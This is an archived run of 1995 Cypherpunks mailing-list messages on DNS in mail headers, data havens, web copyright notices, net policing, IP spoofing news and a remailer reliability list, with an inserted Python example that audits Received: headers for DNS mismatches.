>Received: from relay2.UU.NET by eri.erinet.com (4.1/SMI-4.1.1)
>	id AA16848; Sun, 22 Jan 95 02:56:29 EST
>Received: from toad.com by relay2.UU.NET with SMTP 
>	id QQxztg01780; Sun, 22 Jan 1995 03:01:32 -0500
>Received: by toad.com id AA23166; Sat, 21 Jan 95 23:55:03 PST
>Received: from northpole.org (tower.stc.housing.washington.edu) by toad.com 
>	id AA22783; Sat, 21 Jan 95 23:36:47 PST
> ...

Presumably the (tower.stc.housing.washington.edu) comes from a PTR DNS 
lookup. What happens if the IP address of the remailer isn't available from 
DNS, or the in-addr.arpa entry is wrong?  (I don't know who exactly is 
responsible for the in-addr.arpa entry--is it the same as for the others?)

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com
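
The reverse-lookup question raised in the message above, worked as an added example (not part of the original post or of any mailer's code): it parses the "from" clause of each quoted Received: header and reports when the announced name, the recorded PTR name and the forward lookup disagree. The last three headers, the example.* names, the 192.0.2.x/198.51.100.x addresses and the FORWARD table are constructed, and the assumed clause layout is "from <announced name> (<PTR name> [<IP>]) by <receiver>".

```python
"""Audit the "from" clause of Received: headers (added example)."""
import re

HOP_RE = re.compile(
    r"from\s+(?P<helo>\S+)"          # name the sending side announced
    r"(?:\s+\((?P<info>[^)]*)\))?"   # what the receiver recorded about the peer
    r"\s+by\s+(?P<by>\S+)",
    re.IGNORECASE,
)
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")

# First four headers are the ones quoted in the post; the rest are constructed.
HEADERS = [
    "Received: from relay2.UU.NET by eri.erinet.com (4.1/SMI-4.1.1)\n"
    "\tid AA16848; Sun, 22 Jan 95 02:56:29 EST",
    "Received: from toad.com by relay2.UU.NET with SMTP\n"
    "\tid QQxztg01780; Sun, 22 Jan 1995 03:01:32 -0500",
    "Received: by toad.com id AA23166; Sat, 21 Jan 95 23:55:03 PST",
    "Received: from northpole.org (tower.stc.housing.washington.edu) by toad.com\n"
    "\tid AA22783; Sat, 21 Jan 95 23:36:47 PST",
    "Received: from mail.example.org ([192.0.2.25]) by mx.example.net id AA00001",
    "Received: from mail.example.org (mail.example.org [198.51.100.7])"
    " by mx.example.net id AA00002",
    "Received: from mail.example.org (mail.example.org [192.0.2.25])"
    " by mx.example.net id AA00003",
]

# Constructed stand-in for forward (name -> address) DNS answers, so the
# example runs offline; a live check would query a resolver instead.
FORWARD = {"mail.example.org": {"192.0.2.25"}}


def parse_hop(header):
    """Return the fields of one hop, or None when the header has no 'from'."""
    text = " ".join(header.split())  # unfold continuation lines
    text = re.sub(r"^received:\s*", "", text, flags=re.IGNORECASE)
    m = HOP_RE.match(text)
    if m is None:
        return None
    info = m.group("info")
    ip = ptr = None
    if info is not None:
        found = IP_RE.search(info)
        if found:
            ip = found.group(1)
        ptr = IP_RE.sub("", info).strip() or None
    return {"helo": m.group("helo"), "by": m.group("by"),
            "recorded": info is not None, "ptr": ptr, "ip": ip}


def audit_hop(hop, forward):
    """List what a reader of this hop cannot take at face value."""
    if not hop["recorded"]:
        return ["no-lookup-recorded"]      # only the announced name survives
    if hop["ptr"] is None:
        return ["no-ptr"]                  # address logged, no reverse name found
    findings = []
    if hop["ptr"].lower() != hop["helo"].lower():
        findings.append("helo-differs-from-ptr")
    # The PTR record is published by whoever runs the reverse zone for the
    # address, so it counts only if the name also resolves back to that address.
    if hop["ip"] is not None and hop["ip"] not in forward.get(hop["ptr"].lower(), set()):
        findings.append("ptr-not-forward-confirmed")
    return findings


def audit_all(headers, forward):
    """Return (announced name, findings) for every hop that has a 'from'."""
    results = []
    for header in headers:
        hop = parse_hop(header)
        if hop is not None:
            results.append((hop["helo"], audit_hop(hop, forward)))
    return results


if __name__ == "__main__":
    for helo, findings in audit_all(HEADERS, FORWARD):
        print(f"{helo:20} {', '.join(findings) or 'consistent'}")
```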





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sun, 22 Jan 95 20:24:04 PST
To: John Young <cypherpunks@toad.com
Subject: Re: Locksmith's Guild wants limit on free speech
Message-ID: <9501230415.AB11561@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:42 PM 1/22/95 -0500, John Young wrote:
> ...  
>Both fear that they do not know the code well enough to take the risk of
>being found at fault by random municipal inspections of construction. 
>A-E's dread the liability and blame by owners for well-known construction
>corner-cutting, and owners suspect their professionals' competency and
>ethics -- afraid that the pros will certify in ignorance or cupidity and
>that the owners will face costly corrections without having the traditional
>scapegoat of over-weening government to justify cheating in the field. 

A classic example of people being unwilling to accept responsibility for the 
outcome of their own actions.  That said, building inspections serve much the 
same function as code reviews, and are a "good thing" for exactly the same 
reason.  I suspect that the A-E's will lobby for liability exemptions, and 
if they fail to get them, they will wind up going to private building 
inspectors/"code consultants" just like in-house accountants bring in 
outside auditors.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Sun, 22 Jan 95 20:24:50 PST
To: Jonathan Cooper <entropy@IntNet.net>
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <Pine.SV4.3.91.950118141828.7755B-100000@xcalibur>
Message-ID: <Pine.SUN.3.91.950122232148.24135H-100000@unix3.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Jan 1995, Jonathan Cooper wrote:

> > 	I could write a procmail recipe and a script in about an hour to
> > automatically secret-share-split and redistribute the incoming submission.
> 
>    I'll wager most of us could.  Question: whom would you redistribute it 
> _TO_?  This seems to be the stumbling block - who is willing to store the 
> data on their machine or net account?

	Why, other data haven operators, of course.

	[ Insert 500 messages about anonymous payment systems, 
FirstVirtual vs DigiCash, remailers, "data haven" guilds, etc. ]

[ ... ]
>    How would you handle retrieval of the data?  

	Details, details. Just off the top of my head: an encrypted 
database that logs where the pieces were split and sent to. When the 
original data haven receives a request for the file, it sends out 
requests to the other data havens, and reassembles the file, and shoots 
it out again to the original owner.

Michael
---
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sun, 22 Jan 95 23:55:04 PST
To: shamrock@netcom.com (Lucky Green)
Subject: Re: A Legal Web Page Issue
In-Reply-To: <v01510109ab48fd6442d9@[192.0.2.1]>
Message-ID: <199501230753.XAA17662@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:

> What a crazy thought. I will make sure to access his URL early and often.
> 
> BTW, what is your homepage URL? Or was that just a spoof?

Not a spoof, but not necessarily a normal home page. What I call my
home page is my "lynx" page, "lynx_bookmarks.html", to which I add
whatever URLs look interesting. (Netcom currently does not support WWW
pages for outside access.)

--Tim May







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 23 Jan 95 00:05:36 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: A Legal Web Page Issue
Message-ID: <v0151010dab4913235de9@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:53 PM 1/22/95, Timothy C. May wrote:
>Lucky Green wrote:
>
>> What a crazy thought. I will make sure to access his URL early and often.
>>
>> BTW, what is your homepage URL? Or was that just a spoof?
>
>Not a spoof, but not necessarily a normal home page. What I call my
>home page is my "lynx" page, "lynx_bookmarks.html", to which I add
>whatever URLs look interesting. (Netcom currently does not support WWW
>pages for outside access.)

I see. I thought that perhaps you had one of those ftp://* homepages that
people here at Netcom seem to set up more and more.


-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Mon, 23 Jan 95 00:15:41 PST
To: Dave Horsfall <dave@esi.COM.AU>
Subject: Re: Anti-porn conference in Manila
In-Reply-To: <Pine.SUN.3.91.950123170842.21383B-100000@eram.esi.com.au>
Message-ID: <Pine.3.89.9501222311.A9801-0100000@netcom19>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Jan 1995, Dave Horsfall wrote:

> Date: Mon, 23 Jan 1995 17:11:20 +1100 (EST)
> From: Dave Horsfall <dave@esi.COM.AU>
> To: cypherpunks@toad.com
> Subject: Re: Anti-porn conference in Manila
> 
> On Sun, 22 Jan 1995, James A. Donald wrote:
> 
> > Both Australia and England have government established
> > religions, so I expect there was a major turn out from
> > those two nations.
> 
> An extract from the Australian Constitution:
> 
> 116. The Commonwealth shall not make any law for establishing any
> religion, or for imposing any religious observance, or for prohibiting the
> free exercise of any religion, and no religious test shall be required as
> a qualification for any office or public trust under the Commonwealth. 
> 
> Do please explain.

Church of England in Australia was, and I believe still is, government 
funded by the Australian government.

Furthermore when my kids went to government school in NSW, Australia,
they were taught Church of England religion by my neighbor, Mrs Law, 
in school, in the classroom.  

If it quacks like a duck ...

I was unaware of the portion of the constitution that you mention.

I suspect that the government and the church are none too clear on it
either.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 23 Jan 95 00:12:30 PST
To: cypherpunks@toad.com
Subject: Re: A Legal Web Page Issue
In-Reply-To: <199501230643.BAA29346@ducie.cs.umass.edu>
Message-ID: <199501230811.AAA19566@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


L. McCarthy wrote:

> The text of the actual copyright notice seems to have a much friendlier slant.
> It resembles a GNU or FSF-type freeware license. Apparently you're just not
> allowed to charge *more* than a flat fee:
> 
> - From the bottom of the cited Web page:
> "Copyright 1994 by Pepper & Corazzini, L.L.P. All rights reserved. 
> Reproduction is permitted so long as no charge is made for copies, no copies
> are placed on any electronic online service or database for which there is a
> fee other than a flat access charge, there is no alteration and this 
> copyright notice is included."

He (Friedman, on the Cyberia list) mentioned that they found
some site that was charging an unacceptable (nonflat?) rate, and sent
them a letter asking for a fee to be paid.

This is what I'm really getting at, the notion of placing material on
a publicly-accessible ftp or Web site and then claiming that
additional rules apply. To put it more clearly, it's a bit like me
posting my phone number and then attaching a claim that anyone may
call me provided they are not a member of, say, a corporation.

Or suppose I attach a "legal notice" in my sig someplace, saying that
while anyone may be able to send mail to me, law firms are required to
pay me $100 every time they send me a message. An unenforceable rule.
(In anarcho-capitalist terms, a la "Snow Crash," I could _try_ to
enforce this, by hiring my own collection agencies, but even Uncle
Enzio's Protection Racket, Inc. would likely scoff at such an attempt.)

A Web site that wishes to impose fees or set rules should do so with
_technological_ methods, not invoke the creaky old copyright system
and bring in the judicial system to enforce a basically unenforceable
policy. Note that Netscape's "Web server" product is basically this
technological approach, wherein Web sites that wish to set access
policies and perhaps charge for access are able to.


And enforcement is tough, in any case.

Since their page can of course be accessed from Russia or Burma or
Upper Ruritania, how can their "no non-flat fees" policy be applied to
all accesses except by charging admission at the gates, themselves?

--Tim May







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 23 Jan 95 00:33:42 PST
To: shamrock@netcom.com (Lucky Green)
Subject: Re: A Legal Web Page Issue
In-Reply-To: <v0151010dab4913235de9@[192.0.2.1]>
Message-ID: <199501230832.AAA22500@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:

...
> >Not a spoof, but not necessarily a normal home page. What I call my
> >home page is my "lynx" page, "lynx_bookmarks.html", to which I add
> >whatever URLs look interesting. (Netcom currently does not support WWW
> >pages for outside access.)
> 
> I see. I thought that perhaps you had one of those ftp://* homepages that
> people here at Netcom seem to set up more and more.

I've never looked into doing this. I've placed a copy of my
lynx_bookmarks.html in my ftp directory at Netcom, full pathname of
/ftp/pub/tc/tcmay/lynx_bookmarks.html, so if anyone knows what
combination of incantations involving http:, www, netcom, ftp, etc. to
include, you can access it. (It's chmod 755, so you can read and
execute.)

(If it works, share it with at least me.)

--Tim May








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sun, 22 Jan 95 11:41:00 PST
To: cypherpunks@toad.com
Subject: Anti-porn conference in Manila
Message-ID: <gate.gV0cZc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



The Religious Alliance Against Pornography has been holding a biggish 
conference in Manila; the focus is on child pornography, and a major topic
of discussion is the evil of electronic networks. The Interpol is among those
participating; the head of their kiddie-porn division claims Britain is the
source of most European stuff, and bemoans the fact that too little is spent
on monitoring traffic, as the war against drugs is considered more important.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Sun, 22 Jan 95 22:57:13 PST
To: cypherpunks@toad.com
Subject: Re: "Internetpol"
Message-ID: <Pine.3.89.9501222356.A14639-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



Netcops 
By Hank, reprinted with permission
<hank@vm.tau.ac.il>

I eased the unmarked cruiser onto the highway, its 424 cubic cc, VJ 
engine purring. Traffic was heavy that day, as convoys of Usenet 
semi-trailers barrelled their way down the Information Super Highway. 
Biker gangs using Crack steered clear of our sedan searching instead for 
Internet tourists in Bermuda shorts and Nikon cameras around their necks.

"Unit 7, Unit 7. Woman reporting a 426, over," came the printout on the
Netcops  IRC channel.

Friday turned to me and gave me that look. The look that he gets when he 
wants to tear someone's head off. Friday is 6'6" and 230 pounds. He enjoys 
inflicting pain when necessary. "It's guys like this who give the 
Internet a bad name. Let's go see what we can do to help," said Friday, 
as he placed the flashing blue Kojak on top of the sedan as I popped the 
car into 5th and slashed by the Usenet truckers hauling their load of 
pornographic magazines and political soapboxes.

We arrived at the Holiday Inn where the lady was staying. Her eyes were 
red and she looked like a Mac had hit her. Under the hurt she was 
actually quite pleasant to look at, kind of like the girl next door. Her 
name was Mary and in between sobs we sat her down and ordered espresso 
from the lounge bar. "It was terrible. I feel so violated. I'd like to
kill the bastard," spat Mary with a vehemence that only Friday could 
understand.

"Just the facts, ma'am," said Friday.

"I'm here overseas for 9 weeks on assignment for my company. My husband 
is back home with our daughter and we decided to stay in contact via the 
Internet. I carry my subnotebook with me every time I travel. My husband 
and I get along great but 9 weeks away from each other is just too long 
so we engage in cyber-sex. You know, private IRC channel, getting 
undressed behind locked doors and describing in intimate detail what we 
are doing to each other. We've been doing it almost daily for 3 weeks,".

"But this last time was different. My husband asked me to do all sorts of 
weird and kinky things and I agreed, but it just seemed wrong. After our 
three hour session, my husband called later that day saying that his 
Internet system was under ICMP redirect attack and that he hasn't been 
able to get Internet access for the past 24 hours,".

Friday cut her off, "Do you use any protection?".

"I normally would have used PGP (Pretty Good Privacy), but I forgot to 
install it before I left home. Listen, this guy at the other end must 
have been listening in on my previous sessions with my husband because
he knew all the right things to say as to not arouse my suspicions,".
Her lip trembled as she tried to hold back her tears but both Friday and 
myself knew time may heal all wounds but the scars remain.

It was now my turn to bring down the hard facts, "Mary it looks like you 
are the victim of a 426 -- net-rape. There are no laws on the Internet, no 
police, no government to turn to. Friday and myself act as volunteers in 
this neck of the woods, along with thousands of others throughout the 
world who mete out our form of frontier justice. What would you like done 
once we catch the perp?".

She didn't hesitate for a moment, "I want nine of his fingers broken,".

"Why nine," I asked.

"There's no greater torture than using the Internet with one finger,".

Friday smiled. Mary had made herself a lifetime fan.

EPILOGUE

We were able to track down the perp via the historical data sampling we 
collect daily via our RMON probe. We just correlated the packets with 
Mary's known IP address and the time of day that the incident happened.
Once we had the perp's IP address we contacted our fellow "cowboys" in 
that area who worked with the sysadmin who backtracked through the Unix 
logs and found the guy.

Needless to say, he will never type fast again.

------
The story you have read is true (giggle) the names have been changed
to protect the guilty.
------

This article appeared in Vol3 No2 Internet Society Magazine, 1994.

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian A. LaMacchia <bal@martigny.ai.mit.edu>
Date: Sun, 22 Jan 95 22:18:02 PST
To: cypherpunks@toad.com
Subject: Markoff/NYT on IP spoofing
Message-ID: <9501230617.AA20253@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


John Markoff writes in Monday's New York Times about a rash of computer
security breaches using IP spoofing to penetrate routers and firewalls.
That's all the technical info I could glean from the story; CERT is
supposed to "make an announcement" later today and tell us what brands
of routers can and cannot be modified to defend against this type of
attack. 

Towards the end of the article Markoff puts in a nice plug for crypto:

      Most computer security experts say that real security on the
   Internet awaits the widespread adoption of encryption technology
   for scrambling data and authenticating messages.
      ``The right answer is encryption because when you encrypt your
   business data you don't care how many people get a copy,'' said
   Eric Schmidt, the chief technical officer of Sun Microsystems. ``My
   prediction is that this will be the only real solution to these
   problems.''

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Sun, 22 Jan 95 22:42:27 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: A Legal Web Page Issue
In-Reply-To: <199501230555.VAA06569@netcom15.netcom.com>
Message-ID: <199501230643.BAA29346@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim May writes:
> Someone on the Cyberia mailing list has announced that his URL on
> legal matters (http://www.commlaw.com/pepper) can only be accessed by
> sites which charge a "flat rate." I'm not at all clear what he means
> by a flat rate here....is is flat rate per month, or per access, or
> what?
[...]
> So, give it a browse and add it if you find it interesting. When he
> sees a bunch of accesses (assuming his system has logs he can look at)
> from sites over which he cannot possibly hope to set policy for, he
> may realize the futility of this.

The text of the actual copyright notice seems to have a much friendlier slant.
It resembles a GNU or FSF-type freeware license. Apparently you're just not
allowed to charge *more* than a flat fee:

- From the bottom of the cited Web page:
"Copyright 1994 by Pepper & Corazzini, L.L.P. All rights reserved. 
Reproduction is permitted so long as no charge is made for copies, no copies
are placed on any electronic online service or database for which there is a
fee other than a flat access charge, there is no alteration and this 
copyright notice is included."

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyNP/2f7YYibNzjpAQHRWwP/YWLgxcrc2PH/J+X8fRLAv4/0GHie6nHK
kM5g0Qmbn7jp352aUmAlOQFgudgLSgx/cQeGKcHU9K6gDRjEYAPQc23PB6pWLL1Y
l8SBfvtJ5ttykIKrMSEFN+XfMfU/aT9Kl6e6EhIluWAEA4KCalGMDQ5h3eQ4VHCl
EHGjwZCE7KM=
=pDG/
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in (Rishab Aiyer Ghosh)
Date: Sun, 22 Jan 95 13:58:47 PST
To: cypherpunks@toad.com
Subject: Re: "Internetpol"
In-Reply-To: <199501222022.MAA14828@netcom7.netcom.com>
Message-ID: <o9yH1c1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@netcom.com (Timothy C. May) writes:

> rishab@dxm.ernet.in wrote:
> > The Religious Alliance Against Pornography has been holding a biggish 
> > conference in Manila; the focus is on child pornography, and a major topic
> > of discussion is the evil of electronic networks. The Interpol is among tho
> 
> Perhaps it will become "Internetpol"?

The Interpol, like many national police agencies, already does attempt to
police the Net. While their work against narcotics and money launderers deals
primarily with the phone network, _child_ pornography (which is legal in
places, but like all porn is illegal if non-consensual, as is usually the
case with kidporn), software piracy, and conspiracy/terrorism is hunted for
in cyberspace. For instance, there was this noise a while ago when they
stumbled on a xenophobic European BBS that had a hit-list of 'black' 
sympathizers. Naturally they aren't particularly good at net.policing, and
no one can ever really be.


-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Mon, 23 Jan 95 03:34:22 PST
To: grendel@netaxs.com (Michael Handler)
Subject: Re: Call Security (Was: Re: TJOAUC 1-7)
In-Reply-To: <Pine.SUN.3.91.950122195349.24135E-100000@unix3.netaxs.com>
Message-ID: <199501231133.DAA14851@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> >  Call Security / Voice Crypto FAQ                     Neil Johnson
> 
> 	This guy showed up in sci.crypt back in November of '94, with the 
> "Call Security" program. It had some new unknown public-key algorithm in 
> it that he had designed himself.

    I recall the event in sci.crypt, though not the names involved.
    The article in TJOAUC is a "FAQ" by someone named Neil Johnson
    (njj@pokey.mc.com) who thanks David Colston and Charlie Merritt
    "the authors" for sharing info...

    The FAQ states boldly:
    "CS uses QPK Quick Public Keys by David Colston.  This public
    key system has been reviewed by Whit Diffie, Gus Simmons (Sandia
    Labs), and posted on sci.crypt."

    and on the next page:
    "8. Is it really secure? You, decide!

    Well, the public keys system used by Call Security, QPK
    (Quick Public Keys) by Dave Colston has survived peer review.
    This is good"

    Are these statements false?  Should someone call for a retraction?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wfgodot@iquest.com (Michael Pierson)
Date: Mon, 23 Jan 95 03:44:07 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: A Legal Web Page Issue
In-Reply-To: <199501230832.AAA22500@netcom11.netcom.com>
Message-ID: <6Hv8lu1u6tu3078yn@iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:
 
> I've never looked into doing this. I've placed a copy of my
> lynx_bookmarks.html in my ftp directory at Netcom, full pathname of
> /ftp/pub/tc/tcmay/lynx_bookmarks.html, so if anyone knows what
> combination of incantations involving http:, www, netcom, ftp, etc. to
> include, you can access it. (It's chmod 755, so you can read and
> execute.)
> 
> (If it works, share it with at least me.)


It was plug-and-play with my lynx.


-Michael





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Mon, 23 Jan 95 02:38:09 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: A Legal Web Page Issue
In-Reply-To: <199501230832.AAA22500@netcom11.netcom.com>
Message-ID: <Pine.SUN.3.91.950123053507.18529B-100000@unix2.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Jan 1995, Timothy C. May wrote:

> I've never looked into doing this. I've placed a copy of my
> lynx_bookmarks.html in my ftp directory at Netcom, full pathname of
> /ftp/pub/tc/tcmay/lynx_bookmarks.html, so if anyone knows what
[ ... ]
> (If it works, share it with at least me.)

	ftp://ftp.netcom.com/pub/tc/tcmay/lynx_bookmarks.html

	It works, I just tested it. However, the successful use of this 
predicates upon being able to log into Netcom's FTP server. "Busy" is an 
understatement for this machine.

	Now, about that LaTex JPEG II HyperMIME player...

Michael
--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: davidm@iconz.co.nz (David Murray)
Date: Sun, 22 Jan 95 09:39:17 PST
To: cypherpunks@toad.com
Subject: Re: Why emoney? Why not a web of debt?
Message-ID: <199501221738.GAA10275@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


>To: Censored Girls Anonymous <carolb@barton.spring.com>
>From: davidm@iconz.co.nz (David Murray)
>Subject: Re: Why emoney? Why not a web of debt?
>Cc: 
>Bcc: 
>X-Attachments: 
>
>>Many companies are already founded on "a web of debt".
>>"Sallie Mae (Student Loans), Ginnie Mae (General Loans), and Freddie Mac
>>(Real Estate Loans)," all come to mind at the moment. They're nicely
>>formatted, processed and make even more money for investors as the
>>interest rates change.
>
>Of course the ultimate IOUs these webs of debt are (implicitly, if not
>explicitly) based on are those of the American taxpayer -- which means
>Uncle Sam is playing collection agency, with the usual supporting cast
>of guns and goons.
>
>>So maybe the remailer IOU's, could be traded for the data haven IOU's,
>>and so forth. I think someone does have a credit card IOU situation.
>>The systems, and precedence for debt trading are there (and interest
>>rates are going up again soon, indicated the Fed last week!).
>
>Of course, someone's going to have to package up those IOUs (and make
>people pay interest if anyone is going to make money out of it... (Even
>students pay interest.) Which is why I'm pushing (endlessly, tediously)
>the idea of a special purpose corporation whose job it is to issue IOUs
>(in return for an equivalent amount of cash). The people who buy the IOUs
>get anonymous ecash that anyone (remailers, data vaults, data havens) will
>accept (because it is credible that it will be repaid), and the corporation
>that issues the IOUs gets to use the money it got paid to earn interest
>until the IOUs are cashed in.
>
>>I just wonder who wants to play "collection agency"?
>
>Which is the big problem for community action generally -- as the community
>gets bigger (and more anonymous?) the effectiveness of communal
>disapprobation diminishes (:-)). A special purpose corporation, on the other
>hand, not only has a reputation to protect, and can be sued, but has an
>interest in making its financial/credit rating details as public as possible
>(reassure the customers, and make more interest income -- although the real
>income is likely to come from fees...)
>
>Cheers,
>
>D.
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 23 Jan 95 06:49:56 PST
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199501231450.GAA05118@kiwi.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@204.95.228.28

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash";
$remailer{"soda"} = "<remailer@csua.berkeley.edu> eric post";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub";
$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
$remailer{"desert"} = "<remail@desert.xs4all.nl> cpunk pgp. post";
$remailer{"nately"} = "<remailer@nately.ucsd.edu> cpunk pgp hash latent cut";
$remailer{"myriad"} = "<remailer@myriad.pc.cc.cmu.edu> cpunk pgp hash latent cut ek";
$remailer{"xs4all"} = "<remailer@xs4all.nl> cpunk pgp hash latent cut post ek";
$remailer{"flame"} = "<tomaz@flame.sinet.org> cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = "<homer@rahul.net> cpunk hash";
$remailer{"mix"} = "<mixmaster@nately.ucsd.edu> cpunk hash latent cut ek";
$remailer{"q"} = "<q@c2.org> cpunk pgp hash latent cut ek";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.

Use "premail -getkeys remailer.help.all@204.95.228.28" as a stopgap to
get PGP keys for the remailer, at least until Matt Ghio gets his
machine situation straightened out. Fingering this address works too.

Last ping: Mon 23 Jan 95 6:00:01 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
syrinx   syrinx@c2.org                              #+     4:59  99.14%
penet    anon@anon.penet.fi               *******+****    33:13  99.99%
rebma    remailer@rebma.mn.org            _..-*.--.-   18:00:23  97.74%
